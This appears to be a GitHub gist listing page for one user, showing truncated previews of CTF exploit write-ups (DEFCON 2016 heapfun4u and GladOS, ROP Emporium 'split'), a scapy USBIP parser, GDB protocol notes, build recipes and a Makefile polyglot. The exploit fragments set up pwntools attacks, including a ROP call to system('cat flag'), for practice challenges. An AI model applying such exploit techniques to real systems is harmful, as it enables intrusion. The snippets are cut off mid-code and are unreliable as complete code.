zachriggle /
Last active Jan 4, 2016
import scapy, struct, socket, binascii, logging
from scapy.all import *
from collections import defaultdict
# Entry
def USBIP(PacketData):
    if PacketData[:2] == '\x01\x11':
zachriggle /
Last active May 25, 2016
DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit

DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit Write-Up

The write-up is the exploit.

Example Output

[*] './heapfun4u'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO

DEFCON Quals 2016 Pwnable -- GladOS

The write-up is basically the exploit.

from pwn import *
# Here's the disassembly for everything
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100

Keybase proof

I hereby claim:

  • I am zachriggle on github.
  • I am zachriggle ( on keybase.
  • I have a public key ASBYNpGGwzmRUnRb5-fg2Qy7jdirdXG-ECeIbGP_Lv72oQo

To claim this, I am signing this object:

zachriggle /
Last active Oct 25, 2017
I fucking hate you, GDB

Lots of commands in GDB's protocol use hex-encoded data. A $ starts a packet, and all packets end with # followed by a one-byte, hex-encoded checksum.

Let's look at the protocol for the request:

remote get /proc/self/cmdline ./cmdline

Which should fetch /proc/self/cmdline and dump it to ./cmdline. It does!

$ phd cmdline
zachriggle /
Created Sep 25, 2017
Exploit for ROP Emporium's "split"
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('split')
# We need to invoke system("cat flag"), which requires knowing the
# location of both the function 'system' as well as the string 'cat flag'.
system = elf.symbols.system
cat_flag ="cat flag").next()
apt-get install python2.7-dev python2.7
apt-get build-dep gdb
apt-get source gdb
sed -i -E "s|python3|/usr/bin/python2.7|" debian/rules
dpkg-buildpackage -uc -us -j8
dpkg -i ../*.deb
RARVM reversible/patchme
Modified 'unrar' source to dump context and disassembly.
Wrote two separate solvers since the challenge was broken.
To build the disassembler/debugger:
- unzip -d unrar
- cd unrar
zachriggle / Makefile
Last active Feb 2, 2021
Makefile polyglot
#if 0
.PHONY: run
run: a.out
	@gcc -xc $(MAKEFILE_LIST)
ifeq (0, 1)